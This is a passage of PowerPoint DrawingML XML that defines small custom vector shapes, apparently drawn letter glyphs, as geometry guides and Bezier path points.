                    <a:cubicBezTo>
                      <a:pt x="8" y="19"/>
                      <a:pt x="8" y="18"/>
                      <a:pt x="9" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="18"/>
                      <a:pt x="10" y="18"/>
                      <a:pt x="10" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="11" y="16"/>
                      <a:pt x="11" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="15"/>
                      <a:pt x="11" y="14"/>
                      <a:pt x="11" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="13" y="0"/>
                      <a:pt x="13" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="14"/>
                      <a:pt x="13" y="15"/>
                      <a:pt x="13" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="18"/>
                      <a:pt x="12" y="18"/>
                      <a:pt x="11" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="20"/>
                      <a:pt x="9" y="20"/>
                      <a:pt x="7" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="20"/>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>
                      <a:pt x="1" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="16"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="1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33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5524500" y="1185863"/>
                <a:ext cx="23813" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 16 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 12"/>
                  <a:gd name="T3" fmla="*/ 15 h 20"/>
                  <a:gd name="T4" fmla="*/ 6 w 12"/>
                  <a:gd name="T5" fmla="*/ 19 h 20"/>
                  <a:gd name="T6" fmla="*/ 8 w 12"/>
                  <a:gd name="T7" fmla="*/ 18 h 20"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 10 w 12"/>
                  <a:gd name="T11" fmla="*/ 15 h 20"/>
                  <a:gd name="T12" fmla="*/ 9 w 12"/>
                  <a:gd name="T13" fmla="*/ 13 h 20"/>
                  <a:gd name="T14" fmla="*/ 6 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 20"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 7 h 20"/>
                  <a:gd name="T18" fmla="*/ 1 w 12"/>
                  <a:gd name="T19" fmla="*/ 4 h 20"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 4 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 6 w 12"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 1 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 12"/>
                  <a:gd name="T29" fmla="*/ 3 h 20"/>
                  <a:gd name="T30" fmla="*/ 10 w 12"/>
                  <a:gd name="T31" fmla="*/ 4 h 20"/>
                  <a:gd name="T32" fmla="*/ 8 w 12"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 12"/>
                  <a:gd name="T35" fmla="*/ 2 h 20"/>
                  <a:gd name="T36" fmla="*/ 4 w 12"/>
                  <a:gd name="T37" fmla="*/ 3 h 20"/>
                  <a:gd name="T38" fmla="*/ 3 w 12"/>
                  <a:gd name="T39" fmla="*/ 4 h 20"/>
                  <a:gd name="T40" fmla="*/ 4 w 12"/>
                  <a:gd name="T41" fmla="*/ 6 h 20"/>
                  <a:gd name="T42" fmla="*/ 5 w 12"/>
                  <a:gd name="T43" fmla="*/ 7 h 20"/>
                  <a:gd name="T44" fmla="*/ 7 w 12"/>
                  <a:gd name="T45" fmla="*/ 9 h 20"/>
                  <a:gd name="T46" fmla="*/ 11 w 12"/>
                  <a:gd name="T47" fmla="*/ 12 h 20"/>
                  <a:gd name="T48" fmla="*/ 12 w 12"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 10 w 12"/>
                  <a:gd name="T51" fmla="*/ 19 h 20"/>
                  <a:gd name="T52" fmla="*/ 6 w 12"/>
                  <a:gd name="T53" fmla="*/ 20 h 20"/>
                  <a:gd name="T54" fmla="*/ 3 w 12"/>
                  <a:gd name="T55" fmla="*/ 20 h 20"/>
                  <a:gd name="T56" fmla="*/ 0 w 12"/>
                  <a:gd name="T5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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="19"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="8" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="10" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="15"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="7" y="11"/>
                      <a:pt x="6" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="9"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="2" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="7"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="4"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="9" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="3"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="3" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="5"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="5" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="7"/>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="10"/>
                      <a:pt x="10" y="11"/>
                      <a:pt x="11" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="12" y="14"/>
                      <a:pt x="12" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="17"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="8" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>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34"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5556250" y="1195388"/>
                <a:ext cx="6350" cy="31750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 15"/>
                  <a:gd name="T2" fmla="*/ 3 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 15"/>
                  <a:gd name="T4" fmla="*/ 3 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 15"/>
                  <a:gd name="T6" fmla="*/ 3 w 3"/>
                  <a:gd name="T7" fmla="*/ 3 h 15"/>
                  <a:gd name="T8" fmla="*/ 2 w 3"/>
                  <a:gd name="T9" fmla="*/ 3 h 15"/>
                  <a:gd name="T10" fmla="*/ 0 w 3"/>
                  <a:gd name="T11" fmla="*/ 3 h 15"/>
                  <a:gd name="T12" fmla="*/ 0 w 3"/>
                  <a:gd name="T13" fmla="*/ 2 h 15"/>
                  <a:gd name="T14" fmla="*/ 0 w 3"/>
                  <a:gd name="T15" fmla="*/ 1 h 15"/>
                  <a:gd name="T16" fmla="*/ 2 w 3"/>
                  <a:gd name="T17" fmla="*/ 0 h 15"/>
                  <a:gd name="T18" fmla="*/ 2 w 3"/>
                  <a:gd name="T19" fmla="*/ 12 h 15"/>
                  <a:gd name="T20" fmla="*/ 3 w 3"/>
                  <a:gd name="T21" fmla="*/ 13 h 15"/>
                  <a:gd name="T22" fmla="*/ 3 w 3"/>
                  <a:gd name="T23" fmla="*/ 14 h 15"/>
                  <a:gd name="T24" fmla="*/ 3 w 3"/>
                  <a:gd name="T25" fmla="*/ 15 h 15"/>
                  <a:gd name="T26" fmla="*/ 2 w 3"/>
                  <a:gd name="T27" fmla="*/ 15 h 15"/>
                  <a:gd name="T28" fmla="*/ 0 w 3"/>
                  <a:gd name="T29" fmla="*/ 15 h 15"/>
                  <a:gd name="T30" fmla="*/ 0 w 3"/>
                  <a:gd name="T31" fmla="*/ 14 h 15"/>
                  <a:gd name="T32" fmla="*/ 0 w 3"/>
                  <a:gd name="T33" fmla="*/ 13 h 15"/>
                  <a:gd name="T34" fmla="*/ 2 w 3"/>
                  <a:gd name="T35"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15">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="3"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="12"/>
                      <a:pt x="2" y="12"/>
                      <a:pt x="3" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="13"/>
                      <a:pt x="3" y="13"/>
                      <a:pt x="3" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="14"/>
                      <a:pt x="3" y="15"/>
                      <a:pt x="3" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="1" y="15"/>
                      <a:pt x="0" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="15"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="1"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35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5583238" y="1185863"/>
                <a:ext cx="22225" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 11"/>
                  <a:gd name="T1" fmla="*/ 16 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 11"/>
                  <a:gd name="T3" fmla="*/ 15 h 20"/>
                  <a:gd name="T4" fmla="*/ 6 w 11"/>
                  <a:gd name="T5" fmla="*/ 19 h 20"/>
                  <a:gd name="T6" fmla="*/ 7 w 11"/>
                  <a:gd name="T7" fmla="*/ 18 h 20"/>
                  <a:gd name="T8" fmla="*/ 9 w 11"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 9 w 11"/>
                  <a:gd name="T11" fmla="*/ 15 h 20"/>
                  <a:gd name="T12" fmla="*/ 9 w 11"/>
                  <a:gd name="T13" fmla="*/ 13 h 20"/>
                  <a:gd name="T14" fmla="*/ 5 w 11"/>
                  <a:gd name="T15" fmla="*/ 10 h 20"/>
                  <a:gd name="T16" fmla="*/ 2 w 11"/>
                  <a:gd name="T17" fmla="*/ 7 h 20"/>
                  <a:gd name="T18" fmla="*/ 1 w 11"/>
                  <a:gd name="T19" fmla="*/ 4 h 20"/>
                  <a:gd name="T20" fmla="*/ 2 w 11"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 3 w 11"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 6 w 11"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 8 w 11"/>
                  <a:gd name="T27" fmla="*/ 1 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 11"/>
                  <a:gd name="T29" fmla="*/ 3 h 20"/>
                  <a:gd name="T30" fmla="*/ 9 w 11"/>
                  <a:gd name="T31" fmla="*/ 4 h 20"/>
                  <a:gd name="T32" fmla="*/ 8 w 11"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 11"/>
                  <a:gd name="T35" fmla="*/ 2 h 20"/>
                  <a:gd name="T36" fmla="*/ 4 w 11"/>
                  <a:gd name="T37" fmla="*/ 3 h 20"/>
                  <a:gd name="T38" fmla="*/ 3 w 11"/>
                  <a:gd name="T39" fmla="*/ 4 h 20"/>
                  <a:gd name="T40" fmla="*/ 3 w 11"/>
                  <a:gd name="T41" fmla="*/ 6 h 20"/>
                  <a:gd name="T42" fmla="*/ 4 w 11"/>
                  <a:gd name="T43" fmla="*/ 7 h 20"/>
                  <a:gd name="T44" fmla="*/ 7 w 11"/>
                  <a:gd name="T45" fmla="*/ 9 h 20"/>
                  <a:gd name="T46" fmla="*/ 10 w 11"/>
                  <a:gd name="T47" fmla="*/ 12 h 20"/>
                  <a:gd name="T48" fmla="*/ 11 w 11"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 10 w 11"/>
                  <a:gd name="T51" fmla="*/ 19 h 20"/>
                  <a:gd name="T52" fmla="*/ 6 w 11"/>
                  <a:gd name="T53" fmla="*/ 20 h 20"/>
                  <a:gd name="T54" fmla="*/ 3 w 11"/>
                  <a:gd name="T55" fmla="*/ 20 h 20"/>
                  <a:gd name="T56" fmla="*/ 0 w 11"/>
                  <a:gd name="T5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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="19"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="7" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="17"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="15"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="7" y="11"/>
                      <a:pt x="5" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="9"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="2" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="7"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="4"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="4"/>
                      <a:pt x="9" y="4"/>
                      <a:pt x="9" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="3" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="7"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="10"/>
                      <a:pt x="10" y="11"/>
                      <a:pt x="10" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="11" y="14"/>
                      <a:pt x="11" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>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36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5611813" y="1185863"/>
                <a:ext cx="28575" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 18"/>
                  <a:gd name="T1" fmla="*/ 0 h 26"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 10 h 26"/>
                  <a:gd name="T6" fmla="*/ 16 w 18"/>
                  <a:gd name="T7" fmla="*/ 0 h 26"/>
                  <a:gd name="T8" fmla="*/ 18 w 18"/>
                  <a:gd name="T9" fmla="*/ 0 h 26"/>
                  <a:gd name="T10" fmla="*/ 11 w 18"/>
                  <a:gd name="T11" fmla="*/ 14 h 26"/>
                  <a:gd name="T12" fmla="*/ 11 w 18"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 8 w 18"/>
                  <a:gd name="T15" fmla="*/ 26 h 26"/>
                  <a:gd name="T16" fmla="*/ 8 w 18"/>
                  <a:gd name="T17" fmla="*/ 14 h 26"/>
                  <a:gd name="T18" fmla="*/ 0 w 18"/>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6">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8"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37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5645150" y="1185863"/>
                <a:ext cx="22225" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 11"/>
                  <a:gd name="T1" fmla="*/ 16 h 20"/>
                  <a:gd name="T2" fmla="*/ 1 w 11"/>
                  <a:gd name="T3" fmla="*/ 15 h 20"/>
                  <a:gd name="T4" fmla="*/ 5 w 11"/>
                  <a:gd name="T5" fmla="*/ 19 h 20"/>
                  <a:gd name="T6" fmla="*/ 7 w 11"/>
                  <a:gd name="T7" fmla="*/ 18 h 20"/>
                  <a:gd name="T8" fmla="*/ 9 w 11"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 9 w 11"/>
                  <a:gd name="T11" fmla="*/ 15 h 20"/>
                  <a:gd name="T12" fmla="*/ 8 w 11"/>
                  <a:gd name="T13" fmla="*/ 13 h 20"/>
                  <a:gd name="T14" fmla="*/ 5 w 11"/>
                  <a:gd name="T15" fmla="*/ 10 h 20"/>
                  <a:gd name="T16" fmla="*/ 2 w 11"/>
                  <a:gd name="T17" fmla="*/ 7 h 20"/>
                  <a:gd name="T18" fmla="*/ 1 w 11"/>
                  <a:gd name="T19" fmla="*/ 4 h 20"/>
                  <a:gd name="T20" fmla="*/ 1 w 11"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 3 w 11"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 6 w 11"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 8 w 11"/>
                  <a:gd name="T27" fmla="*/ 1 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 11"/>
                  <a:gd name="T29" fmla="*/ 3 h 20"/>
                  <a:gd name="T30" fmla="*/ 9 w 11"/>
                  <a:gd name="T31" fmla="*/ 4 h 20"/>
                  <a:gd name="T32" fmla="*/ 7 w 11"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 11"/>
                  <a:gd name="T35" fmla="*/ 2 h 20"/>
                  <a:gd name="T36" fmla="*/ 4 w 11"/>
                  <a:gd name="T37" fmla="*/ 3 h 20"/>
                  <a:gd name="T38" fmla="*/ 3 w 11"/>
                  <a:gd name="T39" fmla="*/ 4 h 20"/>
                  <a:gd name="T40" fmla="*/ 3 w 11"/>
                  <a:gd name="T41" fmla="*/ 6 h 20"/>
                  <a:gd name="T42" fmla="*/ 4 w 11"/>
                  <a:gd name="T43" fmla="*/ 7 h 20"/>
                  <a:gd name="T44" fmla="*/ 7 w 11"/>
                  <a:gd name="T45" fmla="*/ 9 h 20"/>
                  <a:gd name="T46" fmla="*/ 10 w 11"/>
                  <a:gd name="T47" fmla="*/ 12 h 20"/>
                  <a:gd name="T48" fmla="*/ 11 w 11"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 9 w 11"/>
                  <a:gd name="T51" fmla="*/ 19 h 20"/>
                  <a:gd name="T52" fmla="*/ 6 w 11"/>
                  <a:gd name="T53" fmla="*/ 20 h 20"/>
                  <a:gd name="T54" fmla="*/ 2 w 11"/>
                  <a:gd name="T55" fmla="*/ 20 h 20"/>
                  <a:gd name="T56" fmla="*/ 0 w 11"/>
                  <a:gd name="T5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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="1" y="15"/>
                      <a:pt x="1" y="15"/>
                    </a:cubicBezTo>
